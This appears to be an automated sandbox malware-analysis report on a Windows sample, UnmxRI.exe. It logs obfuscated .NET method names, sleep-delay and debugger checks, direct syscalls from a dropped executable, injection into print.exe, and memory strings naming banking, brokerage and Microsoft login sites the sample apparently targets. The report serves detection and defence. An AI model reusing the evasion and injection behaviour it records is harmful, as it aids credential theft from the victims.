Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.cs	High entropy of concatenated method names: 'fLj0Eu470', 'El4O7BbVw', 'hwUiEND30', 'HSH8bFl4M', 'ooYpdiDj1', 'HOPAJfGB3', 'qnP3At5It', 'uFCygHQ01', 'zCkJygWNp', 'NIEFabhsg'
Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, yfqikd0p32kTKoV93bB.cs	High entropy of concatenated method names: 'ijUOUUVsdX', 'JQtOjsnu1l', 'NUtOMveQlB', 'qEqOEHEb3H', 'TxnO95b71H', 'jB8Oxm27U0', 'ATROQ4dcm2', 'abbOdnfCZw', 'PBiO6KDnyP', 'v95Ot388NV'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Spvk00L9cFCStkrT2y.cs	High entropy of concatenated method names: 'FZ71sLfot', 'mOFVJgvDV', 'fAkxNuLEa', 'o5NYHHQ9Z', 'sREasVbVP', 'gHvbhiYV6', 'mhW7KsNEdR3bhVPXnn', 'WmZtxhBg2cx5LjD8u5', 'xP2kreePw', 'jRV0Mt9Fy'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SgowY8X4yixBwmDipa9.cs	High entropy of concatenated method names: 'tRpEvCp3rf', 'fWGEiraOI6', 'MdNE17pYHE', 'ruvEV09tSI', 'vc3EI88crE', 'lHBExBdmOo', 'rLREYynI8v', 'RTAESjrxER', 'kGJEauhyH4', 'y8NEbprsEA'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Bwauf9aYS7ZpZv1l2M.cs	High entropy of concatenated method names: 'YU27VQCOQB', 'UYk7xvVx7s', 'aNA7S5wYOv', 'JPm7aTR3lW', 'j8j7H09ODj', 'n4g7h9UoIo', 'BSW7NMhg4C', 'XE37kM1u71', 'thy7E32DXr', 'rVE70pFWg6'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, gWomal9AEbM4h0nux8.cs	High entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs	High entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, G8ANMjDiUOOsLbf5bW.cs	High entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QqOQQeGEHtIKD26w4j.cs	High entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, yx3SuvyOU8mOkkWcOq.cs	High entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SymJM23RQnEk4iIX2O.cs	High entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Ekk9xhzYCDV7Ex5F26.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, p9w2kf7E5ROrPRdwHn.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, dy4scYnfQbod41ZQD7.cs	High entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, dTCWREXjx9L4UMSOtYS.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, wg7S07bfqZusaPsJR7.cs	High entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QvFRFSSlmclI2FDck0.cs	High entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Kwv8QvRh4iT7DFlSdJ.cs	High entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, NXBkOsdoPa6RYALGIN.cs	High entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SXZXiSZvQcU2WLCXGo.cs	High entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YMmuGV8NrauB8XDf6k.cs	High entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.cs	High entropy of concatenated method names: 'icjOT7esaw', 'RgtTUJcyZL', 'tgAOeop8hG', 'SQdOgp9kxG', 'QvUO4fqikd', 'g2kOnTKoV9', 'gdqsYhH0gi7JU', 'pRVYZ8BkJ', 'JseuiWZFl', 'DLEr932Lv'
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.cs	High entropy of concatenated method names: 'fLj0Eu470', 'El4O7BbVw', 'hwUiEND30', 'HSH8bFl4M', 'ooYpdiDj1', 'HOPAJfGB3', 'qnP3At5It', 'uFCygHQ01', 'zCkJygWNp', 'NIEFabhsg'
Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, yfqikd0p32kTKoV93bB.cs	High entropy of concatenated method names: 'ijUOUUVsdX', 'JQtOjsnu1l', 'NUtOMveQlB', 'qEqOEHEb3H', 'TxnO95b71H', 'jB8Oxm27U0', 'ATROQ4dcm2', 'abbOdnfCZw', 'PBiO6KDnyP', 'v95Ot388NV'
Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'
Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.cs	High entropy of concatenated method names: 'lZA', 'RgtTUJcyZL', 'dZ3', 'MZx', 'NZe', 'EZk', 'XNe8QK', 'mP', 'aY', 'ys'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: Yara match	File source: Process Memory Space: UnmxRI.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tehuvFgZlLZK.exe PID: 6844, type: MEMORYSTR

Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88EDA04
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88ED744
Source: C:\Windows\SysWOW64\print.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\UnmxRI.exe	Memory allocated: 2300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Memory allocated: 24A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Memory allocated: 44A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Memory allocated: 7210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Memory allocated: 8210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Memory allocated: 84C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Memory allocated: 94C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Memory allocated: B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Memory allocated: 2690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Memory allocated: 6FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Memory allocated: 7FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Memory allocated: 6FC0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\UnmxRI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4678	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4432	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Window / User API: threadDelayed 9672	Jump to behavior

Source: C:\Users\user\Desktop\UnmxRI.exe	API coverage: 1.3 %
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	API coverage: 0.3 %
Source: C:\Windows\SysWOW64\print.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\UnmxRI.exe TID: 5656	Thread sleep time: -35529s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe TID: 5588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900	Thread sleep count: 4678 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6148	Thread sleep count: 178 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5016	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe TID: 6332	Thread sleep time: -35529s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe TID: 1576	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe TID: 7132	Thread sleep count: 301 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe TID: 7132	Thread sleep time: -602000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe TID: 7132	Thread sleep count: 9672 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe TID: 7132	Thread sleep time: -19344000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704	Thread sleep time: -80000s >= -30000s
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704	Thread sleep count: 31 > 30
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704	Thread sleep time: -46500s >= -30000s
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704	Thread sleep count: 40 > 30
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704	Thread sleep time: -40000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\print.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\print.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\UnmxRI.exe	Thread delayed: delay time: 35529	Jump to behavior
Source: C:\Users\user\Desktop\UnmxRI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Thread delayed: delay time: 35529	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: y14291878.16.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: y14291878.16.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: y14291878.16.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: y14291878.16.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: y14291878.16.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: y14291878.16.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: y14291878.16.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: y14291878.16.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: y14291878.16.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: y14291878.16.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: y14291878.16.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: y14291878.16.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4494943384.000000000111F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: y14291878.16.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: y14291878.16.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: y14291878.16.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: y14291878.16.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: y14291878.16.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: y14291878.16.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: y14291878.16.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: y14291878.16.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: y14291878.16.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: y14291878.16.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: y14291878.16.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\UnmxRI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	Process queried: DebugPort	Jump to behavior

Windows Analysis Report UnmxRI.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
UnmxRI.exe

Malware Threat Intel
Provided by

Source: C:\Users\user\Desktop\UnmxRI.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtQueryValueKey: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe	NtResumeThread: Direct from: 0x76EF36AC
